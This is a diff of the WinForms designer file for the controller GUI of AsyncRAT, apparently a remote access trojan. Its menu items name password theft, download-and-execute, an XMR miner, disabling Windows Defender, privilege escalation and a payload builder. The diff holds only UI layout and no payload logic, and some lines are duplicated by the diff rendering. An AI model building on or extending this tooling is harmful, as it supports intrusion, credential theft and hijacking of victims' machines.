this.blockClientsToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.blockClientsToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.toolStripSeparator5 = new System.Windows.Forms.ToolStripSeparator();
this.bUILDERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.bUILDERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.statusStrip1 = new System.Windows.Forms.StatusStrip();
this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel();
this.toolStripStatusLabel2 = new System.Windows.Forms.ToolStripStatusLabel();
this.ping = new System.Windows.Forms.Timer(this.components);
this.UpdateUI = new System.Windows.Forms.Timer(this.components);
this.tabControl1 = new System.Windows.Forms.TabControl();
this.tabPage1 = new System.Windows.Forms.TabPage();
this.tabPage2 = new System.Windows.Forms.TabPage();
this.listView2 = new System.Windows.Forms.ListView();
this.columnHeader1 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.columnHeader2 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.contextMenuLogs = new System.Windows.Forms.ContextMenuStrip(this.components);
this.cLEARToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.tabPage3 = new System.Windows.Forms.TabPage();
this.listView3 = new System.Windows.Forms.ListView();
this.contextMenuThumbnail = new System.Windows.Forms.ContextMenuStrip(this.components);
this.sTARTToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.sTARTToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.sTOPToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.sTOPToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.ThumbnailImageList = new System.Windows.Forms.ImageList(this.components);
this.tabPage4 = new System.Windows.Forms.TabPage();
this.listView4 = new System.Windows.Forms.ListView();
this.columnHeader4 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.columnHeader5 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.contextMenuTasks = new System.Windows.Forms.ContextMenuStrip(this.components);
this.pASSWORDRECOVERYToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.downloadAndExecuteToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.sENDFILETOMEMORYToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.minerToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.uPDATEToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.toolStripSeparator4 = new System.Windows.Forms.ToolStripSeparator();
this.dELETETASKToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.performanceCounter1 = new System.Diagnostics.PerformanceCounter();
this.performanceCounter2 = new System.Diagnostics.PerformanceCounter();
this.notifyIcon1 = new System.Windows.Forms.NotifyIcon(this.components);
this.TimerTask = new System.Windows.Forms.Timer(this.components);
this.contextMenuClient.SuspendLayout(); this.contextMenuClient.SuspendLayout();
this.statusStrip1.SuspendLayout(); this.statusStrip1.SuspendLayout();
this.tabControl1.SuspendLayout(); this.tabControl1.SuspendLayout();
@ -157,7 +158,7 @@
this.lv_admin, this.lv_admin,
this.lv_av, this.lv_av,
this.lv_ping, this.lv_ping,
this.lv_prefor}); this.lv_act});
this.listView1.ContextMenuStrip = this.contextMenuClient; this.listView1.ContextMenuStrip = this.contextMenuClient;
this.listView1.Dock = System.Windows.Forms.DockStyle.Fill; this.listView1.Dock = System.Windows.Forms.DockStyle.Fill;
this.listView1.FullRowSelect = true; this.listView1.FullRowSelect = true;
@ -224,10 +225,10 @@
// //
this.lv_ping.Text = "Ping"; this.lv_ping.Text = "Ping";
// //
// lv_prefor // lv_act
// //
this.lv_prefor.Text = "Miner"; this.lv_act.Text = "Active Window";
this.lv_prefor.Width = 200; this.lv_act.Width = 350;
// //
// contextMenuClient // contextMenuClient
// //
@ -247,6 +248,302 @@
this.contextMenuClient.Name = "contextMenuStrip1"; this.contextMenuClient.Name = "contextMenuStrip1";
this.contextMenuClient.Size = new System.Drawing.Size(203, 278); this.contextMenuClient.Size = new System.Drawing.Size(203, 278);
// //
// toolStripSeparator2
//
this.toolStripSeparator2.Name = "toolStripSeparator2";
this.toolStripSeparator2.Size = new System.Drawing.Size(199, 6);
//
// toolStripSeparator1
//
this.toolStripSeparator1.Name = "toolStripSeparator1";
this.toolStripSeparator1.Size = new System.Drawing.Size(199, 6);
//
// toolStripSeparator5
//
this.toolStripSeparator5.Name = "toolStripSeparator5";
this.toolStripSeparator5.Size = new System.Drawing.Size(199, 6);
//
// statusStrip1
//
this.statusStrip1.ImageScalingSize = new System.Drawing.Size(24, 24);
this.statusStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.toolStripStatusLabel1,
this.toolStripStatusLabel2});
this.statusStrip1.Location = new System.Drawing.Point(0, 479);
this.statusStrip1.Name = "statusStrip1";
this.statusStrip1.Size = new System.Drawing.Size(1301, 32);
this.statusStrip1.TabIndex = 1;
this.statusStrip1.Text = "statusStrip1";
//
// toolStripStatusLabel1
//
this.toolStripStatusLabel1.Name = "toolStripStatusLabel1";
this.toolStripStatusLabel1.Size = new System.Drawing.Size(24, 25);
this.toolStripStatusLabel1.Text = "...";
//
// toolStripStatusLabel2
//
this.toolStripStatusLabel2.Name = "toolStripStatusLabel2";
this.toolStripStatusLabel2.Size = new System.Drawing.Size(204, 25);
this.toolStripStatusLabel2.Text = " Notification";
this.toolStripStatusLabel2.Click += new System.EventHandler(this.ToolStripStatusLabel2_Click);
//
// ping
//
this.ping.Enabled = true;
this.ping.Interval = 30000;
this.ping.Tick += new System.EventHandler(this.ping_Tick);
//
// UpdateUI
//
this.UpdateUI.Enabled = true;
this.UpdateUI.Interval = 500;
this.UpdateUI.Tick += new System.EventHandler(this.UpdateUI_Tick);
//
// tabControl1
//
this.tabControl1.Controls.Add(this.tabPage1);
this.tabControl1.Controls.Add(this.tabPage2);
this.tabControl1.Controls.Add(this.tabPage3);
this.tabControl1.Controls.Add(this.tabPage4);
this.tabControl1.Dock = System.Windows.Forms.DockStyle.Fill;
this.tabControl1.Location = new System.Drawing.Point(0, 0);
this.tabControl1.Name = "tabControl1";
this.tabControl1.SelectedIndex = 0;
this.tabControl1.Size = new System.Drawing.Size(1301, 479);
this.tabControl1.SizeMode = System.Windows.Forms.TabSizeMode.Fixed;
this.tabControl1.TabIndex = 2;
//
// tabPage1
//
this.tabPage1.Controls.Add(this.listView1);
this.tabPage1.Location = new System.Drawing.Point(4, 29);
this.tabPage1.Name = "tabPage1";
this.tabPage1.Padding = new System.Windows.Forms.Padding(3);
this.tabPage1.Size = new System.Drawing.Size(1293, 446);
this.tabPage1.TabIndex = 0;
this.tabPage1.Text = "Clients";
//
// tabPage2
//
this.tabPage2.Controls.Add(this.listView2);
this.tabPage2.Location = new System.Drawing.Point(4, 29);
this.tabPage2.Name = "tabPage2";
this.tabPage2.Padding = new System.Windows.Forms.Padding(3);
this.tabPage2.Size = new System.Drawing.Size(1293, 446);
this.tabPage2.TabIndex = 1;
this.tabPage2.Text = "Logs";
this.tabPage2.UseVisualStyleBackColor = true;
//
// listView2
//
this.listView2.BorderStyle = System.Windows.Forms.BorderStyle.None;
this.listView2.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
this.columnHeader1,
this.columnHeader2});
this.listView2.ContextMenuStrip = this.contextMenuLogs;
this.listView2.Dock = System.Windows.Forms.DockStyle.Fill;
this.listView2.FullRowSelect = true;
this.listView2.GridLines = true;
this.listView2.HideSelection = false;
this.listView2.Location = new System.Drawing.Point(3, 3);
this.listView2.Name = "listView2";
this.listView2.ShowGroups = false;
this.listView2.ShowItemToolTips = true;
this.listView2.Size = new System.Drawing.Size(1287, 440);
this.listView2.TabIndex = 1;
this.listView2.UseCompatibleStateImageBehavior = false;
this.listView2.View = System.Windows.Forms.View.Details;
//
// columnHeader1
//
this.columnHeader1.Text = "Time";
this.columnHeader1.Width = 150;
//
// columnHeader2
//
this.columnHeader2.Text = "Message";
this.columnHeader2.Width = 705;
//
// contextMenuLogs
//
this.contextMenuLogs.ImageScalingSize = new System.Drawing.Size(24, 24);
this.contextMenuLogs.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.cLEARToolStripMenuItem});
this.contextMenuLogs.Name = "contextMenuLogs";
this.contextMenuLogs.ShowImageMargin = false;
this.contextMenuLogs.Size = new System.Drawing.Size(111, 36);
//
// cLEARToolStripMenuItem
//
this.cLEARToolStripMenuItem.Name = "cLEARToolStripMenuItem";
this.cLEARToolStripMenuItem.Size = new System.Drawing.Size(110, 32);
this.cLEARToolStripMenuItem.Text = "CLEAR";
this.cLEARToolStripMenuItem.Click += new System.EventHandler(this.CLEARToolStripMenuItem_Click);
//
// tabPage3
//
this.tabPage3.Controls.Add(this.listView3);
this.tabPage3.Location = new System.Drawing.Point(4, 29);
this.tabPage3.Name = "tabPage3";
this.tabPage3.Size = new System.Drawing.Size(1293, 446);
this.tabPage3.TabIndex = 2;
this.tabPage3.Text = "Thumbnail";
this.tabPage3.UseVisualStyleBackColor = true;
//
// listView3
//
this.listView3.ContextMenuStrip = this.contextMenuThumbnail;
this.listView3.Dock = System.Windows.Forms.DockStyle.Fill;
this.listView3.HideSelection = false;
this.listView3.LargeImageList = this.ThumbnailImageList;
this.listView3.Location = new System.Drawing.Point(0, 0);
this.listView3.Name = "listView3";
this.listView3.ShowItemToolTips = true;
this.listView3.Size = new System.Drawing.Size(1293, 446);
this.listView3.SmallImageList = this.ThumbnailImageList;
this.listView3.TabIndex = 0;
this.listView3.UseCompatibleStateImageBehavior = false;
//
// contextMenuThumbnail
//
this.contextMenuThumbnail.ImageScalingSize = new System.Drawing.Size(24, 24);
this.contextMenuThumbnail.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.sTARTToolStripMenuItem,
this.sTOPToolStripMenuItem});
this.contextMenuThumbnail.Name = "contextMenuStrip2";
this.contextMenuThumbnail.Size = new System.Drawing.Size(144, 68);
//
// ThumbnailImageList
//
this.ThumbnailImageList.ColorDepth = System.Windows.Forms.ColorDepth.Depth16Bit;
this.ThumbnailImageList.ImageSize = new System.Drawing.Size(256, 256);
this.ThumbnailImageList.TransparentColor = System.Drawing.Color.Transparent;
//
// tabPage4
//
this.tabPage4.Controls.Add(this.listView4);
this.tabPage4.Location = new System.Drawing.Point(4, 29);
this.tabPage4.Name = "tabPage4";
this.tabPage4.Padding = new System.Windows.Forms.Padding(3);
this.tabPage4.Size = new System.Drawing.Size(1293, 446);
this.tabPage4.TabIndex = 3;
this.tabPage4.Text = "Tasks";
this.tabPage4.UseVisualStyleBackColor = true;
//
// listView4
//
this.listView4.BorderStyle = System.Windows.Forms.BorderStyle.None;
this.listView4.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
this.columnHeader4,
this.columnHeader5});
this.listView4.ContextMenuStrip = this.contextMenuTasks;
this.listView4.Dock = System.Windows.Forms.DockStyle.Fill;
this.listView4.FullRowSelect = true;
this.listView4.HideSelection = false;
this.listView4.Location = new System.Drawing.Point(3, 3);
this.listView4.Name = "listView4";
this.listView4.Size = new System.Drawing.Size(1287, 440);
this.listView4.TabIndex = 0;
this.listView4.UseCompatibleStateImageBehavior = false;
this.listView4.View = System.Windows.Forms.View.Details;
//
// columnHeader4
//
this.columnHeader4.Text = "Task";
this.columnHeader4.Width = 97;
//
// columnHeader5
//
this.columnHeader5.Text = "Execution";
this.columnHeader5.Width = 116;
//
// contextMenuTasks
//
this.contextMenuTasks.ImageScalingSize = new System.Drawing.Size(24, 24);
this.contextMenuTasks.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.pASSWORDRECOVERYToolStripMenuItem,
this.downloadAndExecuteToolStripMenuItem,
this.sENDFILETOMEMORYToolStripMenuItem1,
this.minerToolStripMenuItem1,
this.uPDATEToolStripMenuItem1,
this.toolStripSeparator4,
this.dELETETASKToolStripMenuItem});
this.contextMenuTasks.Name = "contextMenuStrip4";
this.contextMenuTasks.ShowImageMargin = false;
this.contextMenuTasks.Size = new System.Drawing.Size(250, 202);
//
// pASSWORDRECOVERYToolStripMenuItem
//
this.pASSWORDRECOVERYToolStripMenuItem.Name = "pASSWORDRECOVERYToolStripMenuItem";
this.pASSWORDRECOVERYToolStripMenuItem.Size = new System.Drawing.Size(249, 32);
this.pASSWORDRECOVERYToolStripMenuItem.Text = "PASSWORD RECOVERY";
this.pASSWORDRECOVERYToolStripMenuItem.Click += new System.EventHandler(this.PASSWORDRECOVERYToolStripMenuItem_Click);
//
// downloadAndExecuteToolStripMenuItem
//
this.downloadAndExecuteToolStripMenuItem.Name = "downloadAndExecuteToolStripMenuItem";
this.downloadAndExecuteToolStripMenuItem.Size = new System.Drawing.Size(249, 32);
this.downloadAndExecuteToolStripMenuItem.Text = "SEND FILE TO DISK";
this.downloadAndExecuteToolStripMenuItem.Click += new System.EventHandler(this.DownloadAndExecuteToolStripMenuItem_Click);
//
// sENDFILETOMEMORYToolStripMenuItem1
//
this.sENDFILETOMEMORYToolStripMenuItem1.Name = "sENDFILETOMEMORYToolStripMenuItem1";
this.sENDFILETOMEMORYToolStripMenuItem1.Size = new System.Drawing.Size(249, 32);
this.sENDFILETOMEMORYToolStripMenuItem1.Text = "SEND FILE TO MEMORY";
this.sENDFILETOMEMORYToolStripMenuItem1.Click += new System.EventHandler(this.SENDFILETOMEMORYToolStripMenuItem1_Click);
//
// minerToolStripMenuItem1
//
this.minerToolStripMenuItem1.Name = "minerToolStripMenuItem1";
this.minerToolStripMenuItem1.Size = new System.Drawing.Size(249, 32);
this.minerToolStripMenuItem1.Text = "XMR MINER";
this.minerToolStripMenuItem1.Visible = false;
this.minerToolStripMenuItem1.Click += new System.EventHandler(this.MinerToolStripMenuItem1_Click);
//
// uPDATEToolStripMenuItem1
//
this.uPDATEToolStripMenuItem1.Name = "uPDATEToolStripMenuItem1";
this.uPDATEToolStripMenuItem1.Size = new System.Drawing.Size(249, 32);
this.uPDATEToolStripMenuItem1.Text = "UPDATE ALL CLIENTS";
this.uPDATEToolStripMenuItem1.Click += new System.EventHandler(this.UPDATEToolStripMenuItem1_Click);
//
// toolStripSeparator4
//
this.toolStripSeparator4.Name = "toolStripSeparator4";
this.toolStripSeparator4.Size = new System.Drawing.Size(246, 6);
//
// dELETETASKToolStripMenuItem
//
this.dELETETASKToolStripMenuItem.Name = "dELETETASKToolStripMenuItem";
this.dELETETASKToolStripMenuItem.Size = new System.Drawing.Size(249, 32);
this.dELETETASKToolStripMenuItem.Text = "DELETE TASK";
this.dELETETASKToolStripMenuItem.Click += new System.EventHandler(this.DELETETASKToolStripMenuItem_Click);
//
// performanceCounter1
//
this.performanceCounter1.CategoryName = "Processor";
this.performanceCounter1.CounterName = "% Processor Time";
this.performanceCounter1.InstanceName = "_Total";
//
// performanceCounter2
//
this.performanceCounter2.CategoryName = "Memory";
this.performanceCounter2.CounterName = "% Committed Bytes In Use";
//
// notifyIcon1
//
this.notifyIcon1.Icon = ((System.Drawing.Icon)(resources.GetObject("notifyIcon1.Icon")));
this.notifyIcon1.Text = "AsyncRAT";
this.notifyIcon1.Visible = true;
//
// TimerTask
//
this.TimerTask.Enabled = true;
this.TimerTask.Interval = 5000;
this.TimerTask.Tick += new System.EventHandler(this.TimerTask_Tick);
//
// aBOUTToolStripMenuItem // aBOUTToolStripMenuItem
// //
this.aBOUTToolStripMenuItem.Image = global::Server.Properties.Resources.info; this.aBOUTToolStripMenuItem.Image = global::Server.Properties.Resources.info;
@ -255,11 +552,6 @@
this.aBOUTToolStripMenuItem.Text = "ABOUT"; this.aBOUTToolStripMenuItem.Text = "ABOUT";
this.aBOUTToolStripMenuItem.Click += new System.EventHandler(this.ABOUTToolStripMenuItem_Click); this.aBOUTToolStripMenuItem.Click += new System.EventHandler(this.ABOUTToolStripMenuItem_Click);
// //
// toolStripSeparator2
//
this.toolStripSeparator2.Name = "toolStripSeparator2";
this.toolStripSeparator2.Size = new System.Drawing.Size(199, 6);
//
// sENDFILEToolStripMenuItem // sENDFILEToolStripMenuItem
// //
this.sENDFILEToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { this.sENDFILEToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
@ -445,6 +737,7 @@
this.xMRMinerToolStripMenuItem.Name = "xMRMinerToolStripMenuItem"; this.xMRMinerToolStripMenuItem.Name = "xMRMinerToolStripMenuItem";
this.xMRMinerToolStripMenuItem.Size = new System.Drawing.Size(260, 34); this.xMRMinerToolStripMenuItem.Size = new System.Drawing.Size(260, 34);
this.xMRMinerToolStripMenuItem.Text = "XMR Miner"; this.xMRMinerToolStripMenuItem.Text = "XMR Miner";
this.xMRMinerToolStripMenuItem.Visible = false;
// //
// runToolStripMenuItem // runToolStripMenuItem
// //
@ -470,7 +763,8 @@
this.chatToolStripMenuItem1, this.chatToolStripMenuItem1,
this.getAdminPrivilegesToolStripMenuItem, this.getAdminPrivilegesToolStripMenuItem,
this.blankScreenToolStripMenuItem, this.blankScreenToolStripMenuItem,
this.disableWindowsDefenderToolStripMenuItem}); this.disableWindowsDefenderToolStripMenuItem,
this.setWallpaperToolStripMenuItem});
this.extraToolStripMenuItem.Image = global::Server.Properties.Resources.extra; this.extraToolStripMenuItem.Image = global::Server.Properties.Resources.extra;
this.extraToolStripMenuItem.Name = "extraToolStripMenuItem"; this.extraToolStripMenuItem.Name = "extraToolStripMenuItem";
this.extraToolStripMenuItem.Size = new System.Drawing.Size(202, 32); this.extraToolStripMenuItem.Size = new System.Drawing.Size(202, 32);
@ -542,6 +836,14 @@
this.disableWindowsDefenderToolStripMenuItem.Text = "Disable Windows Defender"; this.disableWindowsDefenderToolStripMenuItem.Text = "Disable Windows Defender";
this.disableWindowsDefenderToolStripMenuItem.Click += new System.EventHandler(this.DisableWindowsDefenderToolStripMenuItem_Click_1); this.disableWindowsDefenderToolStripMenuItem.Click += new System.EventHandler(this.DisableWindowsDefenderToolStripMenuItem_Click_1);
// //
// setWallpaperToolStripMenuItem
//
this.setWallpaperToolStripMenuItem.Image = global::Server.Properties.Resources.iconfinder_32_171485__1_;
this.setWallpaperToolStripMenuItem.Name = "setWallpaperToolStripMenuItem";
this.setWallpaperToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
this.setWallpaperToolStripMenuItem.Text = "Set Wallpaper";
this.setWallpaperToolStripMenuItem.Click += new System.EventHandler(this.setWallpaperToolStripMenuItem_Click);
//
// systemToolStripMenuItem // systemToolStripMenuItem
// //
this.systemToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { this.systemToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
@ -638,11 +940,6 @@
this.shutdownToolStripMenuItem1.Text = "Shutdown"; this.shutdownToolStripMenuItem1.Text = "Shutdown";
this.shutdownToolStripMenuItem1.Click += new System.EventHandler(this.ShutdownToolStripMenuItem1_Click); this.shutdownToolStripMenuItem1.Click += new System.EventHandler(this.ShutdownToolStripMenuItem1_Click);
// //
// toolStripSeparator1
//
this.toolStripSeparator1.Name = "toolStripSeparator1";
this.toolStripSeparator1.Size = new System.Drawing.Size(199, 6);
//
// serverToolStripMenuItem // serverToolStripMenuItem
// //
this.serverToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { this.serverToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
@ -660,11 +957,6 @@
this.blockClientsToolStripMenuItem.Text = "Block Clients"; this.blockClientsToolStripMenuItem.Text = "Block Clients";
this.blockClientsToolStripMenuItem.Click += new System.EventHandler(this.BlockClientsToolStripMenuItem_Click); this.blockClientsToolStripMenuItem.Click += new System.EventHandler(this.BlockClientsToolStripMenuItem_Click);
// //
// toolStripSeparator5
//
this.toolStripSeparator5.Name = "toolStripSeparator5";
this.toolStripSeparator5.Size = new System.Drawing.Size(199, 6);
//
// bUILDERToolStripMenuItem // bUILDERToolStripMenuItem
// //
this.bUILDERToolStripMenuItem.Image = global::Server.Properties.Resources.builder; this.bUILDERToolStripMenuItem.Image = global::Server.Properties.Resources.builder;
@ -673,157 +965,6 @@
this.bUILDERToolStripMenuItem.Text = "BUILDER"; this.bUILDERToolStripMenuItem.Text = "BUILDER";
this.bUILDERToolStripMenuItem.Click += new System.EventHandler(this.bUILDERToolStripMenuItem_Click); this.bUILDERToolStripMenuItem.Click += new System.EventHandler(this.bUILDERToolStripMenuItem_Click);
// //
// statusStrip1
//
this.statusStrip1.ImageScalingSize = new System.Drawing.Size(24, 24);
this.statusStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.toolStripStatusLabel1,
this.toolStripStatusLabel2});
this.statusStrip1.Location = new System.Drawing.Point(0, 479);
this.statusStrip1.Name = "statusStrip1";
this.statusStrip1.Size = new System.Drawing.Size(1301, 32);
this.statusStrip1.TabIndex = 1;
this.statusStrip1.Text = "statusStrip1";
//
// toolStripStatusLabel1
//
this.toolStripStatusLabel1.Name = "toolStripStatusLabel1";
this.toolStripStatusLabel1.Size = new System.Drawing.Size(24, 25);
this.toolStripStatusLabel1.Text = "...";
//
// toolStripStatusLabel2
//
this.toolStripStatusLabel2.Name = "toolStripStatusLabel2";
this.toolStripStatusLabel2.Size = new System.Drawing.Size(204, 25);
this.toolStripStatusLabel2.Text = " Notification";
this.toolStripStatusLabel2.Click += new System.EventHandler(this.ToolStripStatusLabel2_Click);
//
// ping
//
this.ping.Enabled = true;
this.ping.Interval = 30000;
this.ping.Tick += new System.EventHandler(this.ping_Tick);
//
// UpdateUI
//
this.UpdateUI.Enabled = true;
this.UpdateUI.Interval = 500;
this.UpdateUI.Tick += new System.EventHandler(this.UpdateUI_Tick);
//
// tabControl1
//
this.tabControl1.Controls.Add(this.tabPage1);
this.tabControl1.Controls.Add(this.tabPage2);
this.tabControl1.Controls.Add(this.tabPage3);
this.tabControl1.Controls.Add(this.tabPage4);
this.tabControl1.Dock = System.Windows.Forms.DockStyle.Fill;
this.tabControl1.Location = new System.Drawing.Point(0, 0);
this.tabControl1.Name = "tabControl1";
this.tabControl1.SelectedIndex = 0;
this.tabControl1.Size = new System.Drawing.Size(1301, 479);
this.tabControl1.SizeMode = System.Windows.Forms.TabSizeMode.Fixed;
this.tabControl1.TabIndex = 2;
//
// tabPage1
//
this.tabPage1.Controls.Add(this.listView1);
this.tabPage1.Location = new System.Drawing.Point(4, 29);
this.tabPage1.Name = "tabPage1";
this.tabPage1.Padding = new System.Windows.Forms.Padding(3);
this.tabPage1.Size = new System.Drawing.Size(1293, 446);
this.tabPage1.TabIndex = 0;
this.tabPage1.Text = "Clients";
//
// tabPage2
//
this.tabPage2.Controls.Add(this.listView2);
this.tabPage2.Location = new System.Drawing.Point(4, 29);
this.tabPage2.Name = "tabPage2";
this.tabPage2.Padding = new System.Windows.Forms.Padding(3);
this.tabPage2.Size = new System.Drawing.Size(1293, 446);
this.tabPage2.TabIndex = 1;
this.tabPage2.Text = "Logs";
this.tabPage2.UseVisualStyleBackColor = true;
//
// listView2
//
this.listView2.BorderStyle = System.Windows.Forms.BorderStyle.None;
this.listView2.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
this.columnHeader1,
this.columnHeader2});
this.listView2.ContextMenuStrip = this.contextMenuLogs;
this.listView2.Dock = System.Windows.Forms.DockStyle.Fill;
this.listView2.FullRowSelect = true;
this.listView2.GridLines = true;
this.listView2.HideSelection = false;
this.listView2.Location = new System.Drawing.Point(3, 3);
this.listView2.Name = "listView2";
this.listView2.ShowGroups = false;
this.listView2.ShowItemToolTips = true;
this.listView2.Size = new System.Drawing.Size(1287, 440);
this.listView2.TabIndex = 1;
this.listView2.UseCompatibleStateImageBehavior = false;
this.listView2.View = System.Windows.Forms.View.Details;
//
// columnHeader1
//
this.columnHeader1.Text = "Time";
this.columnHeader1.Width = 150;
//
// columnHeader2
//
this.columnHeader2.Text = "Message";
this.columnHeader2.Width = 705;
//
// contextMenuLogs
//
this.contextMenuLogs.ImageScalingSize = new System.Drawing.Size(24, 24);
this.contextMenuLogs.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.cLEARToolStripMenuItem});
this.contextMenuLogs.Name = "contextMenuLogs";
this.contextMenuLogs.ShowImageMargin = false;
this.contextMenuLogs.Size = new System.Drawing.Size(111, 36);
//
// cLEARToolStripMenuItem
//
this.cLEARToolStripMenuItem.Name = "cLEARToolStripMenuItem";
this.cLEARToolStripMenuItem.Size = new System.Drawing.Size(110, 32);
this.cLEARToolStripMenuItem.Text = "CLEAR";
this.cLEARToolStripMenuItem.Click += new System.EventHandler(this.CLEARToolStripMenuItem_Click);
//
// tabPage3
//
this.tabPage3.Controls.Add(this.listView3);
this.tabPage3.Location = new System.Drawing.Point(4, 29);
this.tabPage3.Name = "tabPage3";
this.tabPage3.Size = new System.Drawing.Size(1293, 446);
this.tabPage3.TabIndex = 2;
this.tabPage3.Text = "Thumbnail";
this.tabPage3.UseVisualStyleBackColor = true;
//
// listView3
//
this.listView3.ContextMenuStrip = this.contextMenuThumbnail;
this.listView3.Dock = System.Windows.Forms.DockStyle.Fill;
this.listView3.HideSelection = false;
this.listView3.LargeImageList = this.ThumbnailImageList;
this.listView3.Location = new System.Drawing.Point(0, 0);
this.listView3.Name = "listView3";
this.listView3.ShowItemToolTips = true;
this.listView3.Size = new System.Drawing.Size(1293, 446);
this.listView3.SmallImageList = this.ThumbnailImageList;
this.listView3.TabIndex = 0;
this.listView3.UseCompatibleStateImageBehavior = false;
//
// contextMenuThumbnail
//
this.contextMenuThumbnail.ImageScalingSize = new System.Drawing.Size(24, 24);
this.contextMenuThumbnail.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.sTARTToolStripMenuItem,
this.sTOPToolStripMenuItem});
this.contextMenuThumbnail.Name = "contextMenuStrip2";
this.contextMenuThumbnail.Size = new System.Drawing.Size(144, 68);
//
// sTARTToolStripMenuItem // sTARTToolStripMenuItem
// //
this.sTARTToolStripMenuItem.Image = global::Server.Properties.Resources.play_button; this.sTARTToolStripMenuItem.Image = global::Server.Properties.Resources.play_button;
@ -840,135 +981,6 @@
this.sTOPToolStripMenuItem.Text = "STOP"; this.sTOPToolStripMenuItem.Text = "STOP";
this.sTOPToolStripMenuItem.Click += new System.EventHandler(this.STOPToolStripMenuItem_Click); this.sTOPToolStripMenuItem.Click += new System.EventHandler(this.STOPToolStripMenuItem_Click);
// //
// ThumbnailImageList
//
this.ThumbnailImageList.ColorDepth = System.Windows.Forms.ColorDepth.Depth16Bit;
this.ThumbnailImageList.ImageSize = new System.Drawing.Size(256, 256);
this.ThumbnailImageList.TransparentColor = System.Drawing.Color.Transparent;
//
// tabPage4
//
this.tabPage4.Controls.Add(this.listView4);
this.tabPage4.Location = new System.Drawing.Point(4, 29);
this.tabPage4.Name = "tabPage4";
this.tabPage4.Padding = new System.Windows.Forms.Padding(3);
this.tabPage4.Size = new System.Drawing.Size(1293, 446);
this.tabPage4.TabIndex = 3;
this.tabPage4.Text = "Tasks";
this.tabPage4.UseVisualStyleBackColor = true;
//
// listView4
//
this.listView4.BorderStyle = System.Windows.Forms.BorderStyle.None;
this.listView4.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
this.columnHeader4,
this.columnHeader5});
this.listView4.ContextMenuStrip = this.contextMenuTasks;
this.listView4.Dock = System.Windows.Forms.DockStyle.Fill;
this.listView4.FullRowSelect = true;
this.listView4.HideSelection = false;
this.listView4.Location = new System.Drawing.Point(3, 3);
this.listView4.Name = "listView4";
this.listView4.Size = new System.Drawing.Size(1287, 440);
this.listView4.TabIndex = 0;
this.listView4.UseCompatibleStateImageBehavior = false;
this.listView4.View = System.Windows.Forms.View.Details;
//
// columnHeader4
//
this.columnHeader4.Text = "Task";
this.columnHeader4.Width = 97;
//
// columnHeader5
//
this.columnHeader5.Text = "Execution";
this.columnHeader5.Width = 116;
//
// contextMenuTasks
//
this.contextMenuTasks.ImageScalingSize = new System.Drawing.Size(24, 24);
this.contextMenuTasks.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.pASSWORDRECOVERYToolStripMenuItem,
this.downloadAndExecuteToolStripMenuItem,
this.sENDFILETOMEMORYToolStripMenuItem1,
this.minerToolStripMenuItem1,
this.uPDATEToolStripMenuItem1,
this.toolStripSeparator4,
this.dELETETASKToolStripMenuItem});
this.contextMenuTasks.Name = "contextMenuStrip4";
this.contextMenuTasks.ShowImageMargin = false;
this.contextMenuTasks.Size = new System.Drawing.Size(250, 202);
//
// pASSWORDRECOVERYToolStripMenuItem
//
this.pASSWORDRECOVERYToolStripMenuItem.Name = "pASSWORDRECOVERYToolStripMenuItem";
this.pASSWORDRECOVERYToolStripMenuItem.Size = new System.Drawing.Size(249, 32);
this.pASSWORDRECOVERYToolStripMenuItem.Text = "PASSWORD RECOVERY";
this.pASSWORDRECOVERYToolStripMenuItem.Click += new System.EventHandler(this.PASSWORDRECOVERYToolStripMenuItem_Click);
//
// downloadAndExecuteToolStripMenuItem
//
this.downloadAndExecuteToolStripMenuItem.Name = "downloadAndExecuteToolStripMenuItem";
this.downloadAndExecuteToolStripMenuItem.Size = new System.Drawing.Size(249, 32);
this.downloadAndExecuteToolStripMenuItem.Text = "SEND FILE TO DISK";
this.downloadAndExecuteToolStripMenuItem.Click += new System.EventHandler(this.DownloadAndExecuteToolStripMenuItem_Click);
//
// sENDFILETOMEMORYToolStripMenuItem1
//
this.sENDFILETOMEMORYToolStripMenuItem1.Name = "sENDFILETOMEMORYToolStripMenuItem1";
